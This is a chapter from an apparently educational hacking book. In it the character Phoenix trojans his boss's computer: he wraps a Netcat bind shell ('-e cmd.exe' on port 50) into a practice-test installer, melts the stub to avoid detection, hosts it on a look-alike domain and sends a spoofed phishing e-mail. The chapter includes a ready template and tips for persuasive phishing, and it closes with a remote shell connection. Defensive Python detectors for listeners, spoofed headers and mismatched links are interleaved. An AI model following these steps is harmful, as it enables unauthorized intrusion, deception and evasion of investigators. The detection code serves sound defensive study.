Chapter 2: Discover What Your Boss is Looking At

Addison-Wesley Professional


Binding a Trojan with a legitimate executable is a common method hackers employ to trick users into installing malware onto their computers. These binding programs, also called Trojan wrappers, will combine the original program with a Trojan program and create a new executable. In this example, Phoenix uses Yet Another Binder (YAB), which was originally found at areyoufearless.com. (This site no longer hosts YAB, but you can find this free utility through file-sharing services such as BitTorrent or another hacking Web site such as astalavista.net or packetstormsecurity.org.)

On starting YAB, Phoenix sees the screen shown in Figure 2.10.

Figure 2.10 Yet Another Binder

Phoenix clicks the plus sign to bring up the Add Bind File Command screen shown in Figure 2.11.

Figure 2.11 Adding Netcat

Phoenix sets up the options in Table 2.1 to prepare his Trojan for binding:

Table 2.1 Yet Another Binder Options

Option: Select command to add
Value: Bind File
Description: This option enables you to bind a file to another.

Option: Source File Path
Value: C:\nc.exe
Description: This is the path to Phoenix’s Netcat Trojan.

Option: Execution Method
Value: Execute asynchronously
Description: This option installs the Trojan separately from the main executable. Sometimes trying to launch them both at the same time (synchronously) might cause problems, so asynchronous execution is a safer option.

Option: Execution parameters
Value: -p 50 -e cmd.exe -L
Description: This option configures Netcat to listen (-L) in the background for incoming connections to TCP port 50. The -e cmd.exe option tells Netcat to execute the MS-DOS command shell.

Optionally, Phoenix can select to launch the Trojan again when the computer starts up by setting the Registry Startup Method option. For example, Phoenix can configure it to load in HKEY_LOCAL_MACHINE\Microsoft\Windows\CurrentVersion\Run so that the Trojan will launch every time the computer starts. The default value is not to modify the Registry.
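A defender-side check for the kind of listener the table describes, added here as an example and not taken from the book: it correlates constructed `netstat -ano` and `tasklist /fo csv` output by PID and reports every listening TCP port whose owning image is not on an assumed baseline of expected services.

```python
import csv
import io

# Constructed excerpts of `netstat -ano` and `tasklist /fo csv` output from a
# Windows host; the port-50 entry models the Netcat listener described above.
NETSTAT_OUTPUT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:50             0.0.0.0:0              LISTENING       3188
  TCP    192.168.1.5:1054       192.168.1.20:80        ESTABLISHED     2404
  UDP    0.0.0.0:500            *:*                                    1200
"""
TASKLIST_OUTPUT = """\
"Image Name","PID","Session Name","Session#","Mem Usage"
"svchost.exe","912","Console","0","5,012 K"
"nc.exe","3188","Console","0","1,236 K"
"iexplore.exe","2404","Console","0","31,840 K"
"lsass.exe","1200","Console","0","3,972 K"
"""

# Baseline of (image, port) pairs expected to listen on this host (an assumption
# made for the example; a real baseline comes from the host's build standard).
EXPECTED_LISTENERS = {("svchost.exe", 135)}


def parse_tasklist(text):
    """Map PID -> image name from `tasklist /fo csv` output."""
    return {int(row["PID"]): row["Image Name"] for row in csv.DictReader(io.StringIO(text))}


def parse_listeners(text):
    """Yield (port, pid) for every TCP socket that netstat reports as LISTENING."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) == 5 and fields[0] == "TCP" and fields[3] == "LISTENING":
            local_port = int(fields[1].rsplit(":", 1)[1])
            yield local_port, int(fields[4])


def unexpected_listeners(netstat_text, tasklist_text):
    """Return listening sockets whose (image, port) pair is not in the baseline."""
    pid_to_image = parse_tasklist(tasklist_text)
    findings = []
    for port, pid in parse_listeners(netstat_text):
        image = pid_to_image.get(pid, "<unknown>")
        if (image, port) not in EXPECTED_LISTENERS:
            findings.append({"port": port, "pid": pid, "image": image})
    return findings
```

Because the stub is melted after launch, the listening process may have no file on disk to inspect, so the socket-to-process correlation is the durable indicator.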

Phoenix clicks OK after he finishes configuring Netcat. Next Phoenix adds the legitimate program by clicking the plus sign again to add it. He selects Execute File in the Select command to add drop-down box (see Figure 2.12). He enters the complete path to the backup.exe executable file, leaves the other options at their default, and then clicks OK.

Figure 2.12 Adding the executable

Before Phoenix binds the two files together, he first makes sure that all traces of the Netcat executable will be removed after it launches. This helps to prevent users from detecting his malware on their computer. Trojan wrappers often have this option to melt, or remove, all traces of the malware executable after the software is running in RAM. Although choosing to melt the file is ideal to avoid detection, it does have a side effect: If the file is gone, Phoenix cannot launch it again when the computer starts up. He chooses to melt Netcat by going to the Options menu and choosing Melt Stub After Execution (see Figure 2.13).

Figure 2.13 Melt Stub After Execution option

To make this Trojan appear legitimate, Phoenix selects an icon that looks like a standard install program. In the Icon Preview box, he clicks (none) to bring up the Change Icon dialog box. From here, he chooses an icon that looks like a standard install program. Icon 7 and Icon 8 are two good options (see Figure 2.14).

Figure 2.14 Choosing an icon

Now Phoenix is ready to bind the stub (Netcat) to the executable (backup.exe). He clicks the Bind File button. He now has his Trojan program, which he saves as setup.exe.

Because the installation is dependent on many other files, Phoenix needs to create a self-extracting archive that bundles all the files necessary for installation. He launches WinZip Self-Extractor and chooses Self-extracting Zip file for Software Installation (see Figure 2.15).

Figure 2.15 WinZip self-extractor

Phoenix selects Unzip automatically (see Figure 2.16) so that the archiving is transparent to the user. When the wizard prompts him for the name of the executable to launch when the unzipping process is complete, he chooses setup.exe (see Figure 2.17). When his boss launches the CCNA program, it will unzip the files and run setup.exe, which will install both the legitimate practice test software and Netcat. Netcat will run in the background and listen for incoming connections on TCP (Transmission Control Protocol) port 50.

Figure 2.16 Choosing to unzip automatically

Figure 2.17 Executing setup.exe on completion

Setting Up the Phishing Site

Phoenix now has created his new program to host on his phishing Web site. He gives his file the same name as the original program (ccna.exe) from the legitimate Web site, and copies it to the same directory where the first ccna.exe was located (overwriting it). He will need to copy all the phishing Web site files to a Web server that can host them. To make the phishing scam appear as legitimate as possible, he decides to register a domain name that is similar to the original Web site. The original Web site is certificationpractice.com, so he registers the domain certification-practice.com. Now he has a fully functional Web site with a name similar to that of the original Web site, along with a new Trojan that appears to be a legitimate practice test application.

By reusing the same Web site, Phoenix has broken copyright law. In addition, he might face further prosecution for any other instances of people downloading and running the malware that he created.

Sending Mr. Minutia an E-mail

Phoenix has copied a Web site, created a Trojan, and hosted a new Web site with a link to his Trojan. All of this won’t help him unless he can somehow direct his boss, Mr. Minutia, to visit and download his Trojan. The easiest way to do this is to send a spoofed e-mail to his boss that appears to come from the Web site Phoenix hosts. When his boss looks in the e-mail's From: field, he should see an e-mail address coming from the certification-practice.com domain and not Phoenix’s e-mail address. Mr. Minutia can discover the real e-mail address only by looking at the e-mail header. Reading the e-mail header is something few people know how to do, and, even if they do, most rarely look at it in their e-mail software.

Although Phoenix could send an e-mail using his e-mail client at his workplace, this would make it easy for him to be tracked down in the event that someone does look in the e-mail header. To cover his tracks, he uses an anonymous e-mail service such as mail.com. His steps, then, are as follows:

  1. Register an anonymous e-mail at mail.com

  2. Create an e-mail that entices his boss to visit the phishing Web site and download the CCNA executable bound with the Trojan

  3. Change the From: field to an e-mail address with the certification-practice.com domain

Registering an anonymous e-mail at mail.com is easy. Phoenix goes to http://www.mail.com and signs up for its free, anonymous e-mail. Unlike many e-mail services that require you to enter an alternative e-mail address, your postal address, or other personal information, sites such as mail.com do not. This anonymity protects Phoenix from investigators being able to track him down.

If a hacker wants further protection, the hacker can go through an anonymous proxy server. Anonymization.net and TorPark are two such proxies.

Next, Phoenix uses the mail.com instructions to configure his e-mail client. He decides on Outlook Express.

You might be wondering why Phoenix needs to have an anonymous e-mail account if he is going to change the From: field. Changing the From: field is enough to trick the user, but not enough to trick an investigator looking in the e-mail header. To hide his identity, Phoenix changes both the From: field and uses an anonymous e-mail service.
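The header inspection this section says most readers skip can be automated. The following is an added example, not from the book: it parses a constructed message whose From: claims certification-practice.com while the Return-Path and the earliest Received: hop belong to a webmail provider, and reports the disagreement. All hostnames, addresses and IDs are made up.

```python
import email
from email import policy
from email.utils import parseaddr

# Constructed raw message modelled on the scenario above. The Received: headers
# are listed newest-first, as a receiving mail server would record them.
RAW_MESSAGE = b"""\
Return-Path: <phx1979@mail.com>
Received: from mx2.corp.example (mx2.corp.example [10.0.0.25])
\tby mail.corp.example with ESMTP id 7h3Kq for <minutia@corp.example>
Received: from webmail07.mail.com (webmail07.mail.com [203.0.113.10])
\tby mx2.corp.example with ESMTP id 9fJ2p
From: Certification Practice Exams <support@certification-practice.com>
To: minutia@corp.example
Subject: Free CCNA Practice Test Software

Download your free CCNA practice test today while it lasts!
"""


def domain_of(address):
    """Lower-cased domain part of an e-mail address, or '' if none is present."""
    _, addr = parseaddr(address)
    return addr.rpartition("@")[2].lower()


def sender_domains(raw):
    """Extract the From: domain, the envelope (Return-Path) domain and the first relay host."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    received = msg.get_all("Received", [])
    # The last Received: header is the one added first, closest to the real sender.
    first_hop = str(received[-1]) if received else ""
    hop_host = first_hop.split()[1] if first_hop.startswith("from ") else ""
    return {
        "from": domain_of(str(msg["From"] or "")),
        "return_path": domain_of(str(msg["Return-Path"] or "")),
        "first_hop": hop_host.lower(),
    }


def spoof_indicators(raw):
    """Return human-readable findings where the visible From: disagrees with the transport path."""
    d = sender_domains(raw)
    findings = []
    if d["return_path"] and d["return_path"] != d["from"]:
        findings.append("From: domain %s differs from Return-Path domain %s" % (d["from"], d["return_path"]))
    if d["first_hop"] and not d["first_hop"].endswith(d["from"]):
        findings.append("first Received: hop %s is not a %s host" % (d["first_hop"], d["from"]))
    return findings
```

The same two comparisons are what SPF and DMARC evaluation perform at the mail gateway, so a receiving organization can reject such a message before it reaches the inbox.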

Phoenix now creates an e-mail that should be convincing enough to socially engineer his boss into visiting his site and downloading the Trojan. A good phishing scam e-mail should follow these guidelines:

  • The e-mail should be checked for grammatical and spelling mistakes—People are less likely to trust an e-mail with many typographical errors because it appears unprofessional.

  • The e-mail should offer something free—Everyone likes something free.

  • The e-mail should explain why the victims are getting something for nothing—People know that nothing is really "free" and that there must be a catch. Without the justification for the free item, the victims might become suspicious. They might not necessarily think it is a phishing scam, but they might suspect that they are being tricked into something against their will. If you attempt to give something at no cost, the victims should know why they are getting something free.

  • The e-mail should leave the unsuspecting users feeling good about themselves—Your e-mail is essentially a marketing campaign trying to get your victim to download your software. With information technology professionals (such as Phoenix’s boss, in this scenario), the best approach is to leave them feeling that if they use your product they will be smarter and more successful than if they do not use your product.

  • The e-mail should be brief—People are less likely to read a long e-mail than a short one. Phoenix wants to keep the e-mail short to increase the chance of his boss reading it.

The following is a suggested e-mail that meets these objectives:

Subject: Free CCNA Practice Test Software

Dear Mr. Minutia,

Download your free CCNA practice test today while it lasts!

As an IT professional, you know being industry certified dramatically increases your net worth, your technical ability within your organization, and recognition from your colleagues. Our research has shown that professionals with the CCNA certification earn 15% more on average than those without the certification.

For a limited time, Certification Practice Exams is pleased to offer all registered cisco.com users free CCNA practice test software. This is a $129 value! Why would we be willing to give away so much free? It’s simple. When you use our software to pass the CCNA exam on your first try, we're confident Certification Practice Exams will be your destination for future Cisco certification practice tests. We ask only that, after you pass your exam, you consider us for all future practice test needs.

To download your free CCNA practice test, go to www.certificationpractice.com/ccna and click the CCNA.exe link.

Sincerely,

Certification Practice Exams

You might have noticed that the Web site URL is for the legitimate Web site and not the new phishing Web site that Phoenix created. This is intentional. Although Phoenix could have put in his domain name, a good phishing scam appears as legitimate as possible. This e-mail references the original Web site, but Phoenix has changed the HTML code to link to the phishing site. To do this, Phoenix goes to the source code of the e-mail and changes the link to point to his Web site at www.certification-practice.com/ccna (see Figure 2.18). That way the e-mail text refers to the real Web site, but the code directs Phoenix's boss to the fake Web site. When he's on Phoenix’s Web site, Mr. Minutia will probably never notice that the Web site is different. And, even if he does, it is close enough to the real Web site domain that he probably will not even care.
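The mismatch between the link text and the underlying href is the detectable artifact of this trick. As an added example (not code from the book), the following parses a constructed HTML body modelled on the e-mail above and reports every anchor whose visible text names a different site from the one its href points to; the site comparison uses a deliberately simple last-two-labels rule rather than a public-suffix list.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed HTML body: the first link shows the legitimate domain but points at
# the look-alike; the second link is consistent and must not be reported.
SAMPLE_HTML = """<p>To download your free CCNA practice test, go to
<a href="http://www.certification-practice.com/ccna">www.certificationpractice.com/ccna</a>
and click the CCNA.exe link.</p>
<p>Questions? See <a href="http://www.certificationpractice.com/faq">www.certificationpractice.com/faq</a>.</p>"""


def site_of(host):
    """Crude site name: strip a leading 'www.' and keep the last two labels (assumption: no public-suffix handling)."""
    host = host.lower()
    if host.startswith("www."):
        host = host[4:]
    return ".".join(host.split(".")[-2:])


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def mismatched_links(html):
    """Return (visible text, href) pairs where the text names a URL on a different site than the href."""
    parser = LinkCollector()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        looks_like_url = "." in text and " " not in text   # skip plain words such as "click here"
        if not looks_like_url:
            continue
        text_host = urlparse(text if "://" in text else "http://" + text).hostname or ""
        href_host = urlparse(href).hostname or ""
        if site_of(text_host) != site_of(href_host):
            findings.append((text, href))
    return findings
```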

Figure 2.18 Changing the link

To further encourage his boss, Phoenix approaches him and mentions that he has been thinking about going for the CCNA certification. By mentioning this certification, Phoenix drops a subtle suggestion in his boss’s mind about the certification exam. Gentle suggestions can go a long way toward social engineering the boss into downloading this software. Phoenix remarks, “I received an e-mail from one of those practice test companies today. Did you get one? I haven’t checked it out yet, but it looks like a really good site.” Because Mr. Minutia is a competitive person by nature, Phoenix takes this a step further and entices him to download the software by saying, “You know, I bet you I’ll finish my CCNA before you. I think I’ll go looking for some practice exam software tonight to start preparing.”

Phoenix sends the e-mail, sits back, and waits. After he receives the e-mail, Mr. Minutia will be enticed to download Phoenix’s software. Both the legitimate practice test and Netcat will install on Mr. Minutia's machine during the installation process. Netcat will then be listening on port 50 on Mr. Minutia's machine, waiting for Phoenix to connect.

Finding the Boss’s Computer

The next step is to discover the IP address used on Mr. Minutia’s computer. One method is to use a software tool called Angry IP Scanner (http://www.angryziber.com/ipscan/), which scans a range of IP addresses to discover which hosts are active. See Figure 2.19 for an example of scanning the 192.168.1.0/24 range.

Figure 2.19 Angry IP Scanner

Now that Phoenix has a list of hosts on the network, he can use a port scanner to determine which hosts are listening on port 50 (the port he configured Netcat to listen on). Phoenix chooses Angry IP Scanner. Figure 2.20 shows the output of its port scanner. Notice that port 50, the port he specified Netcat to listen on, is open.

Figure 2.20 Angry IP Scanner port scanner output

Connecting to the Boss’s Computer

The boss’s computer is 192.168.1.5. Now that Phoenix knows the IP address and has verified that TCP port 50 is open, he can connect to Mr. Minutia’s machine. Phoenix opens an MS-DOS command prompt on his computer and navigates to the directory where he has a copy of Netcat. He types in the following command to connect to his boss’s machine:

nc 192.168.1.5 50

Phoenix verifies the connection to his boss's computer using the built-in ipconfig utility. It shows 192.168.1.5 (the IP address of his boss's computer), so he successfully connected to Mr. Minutia’s computer (as shown in Figure 2.21).

Figure 2.21 Connecting to Mr. Minutia’s computer
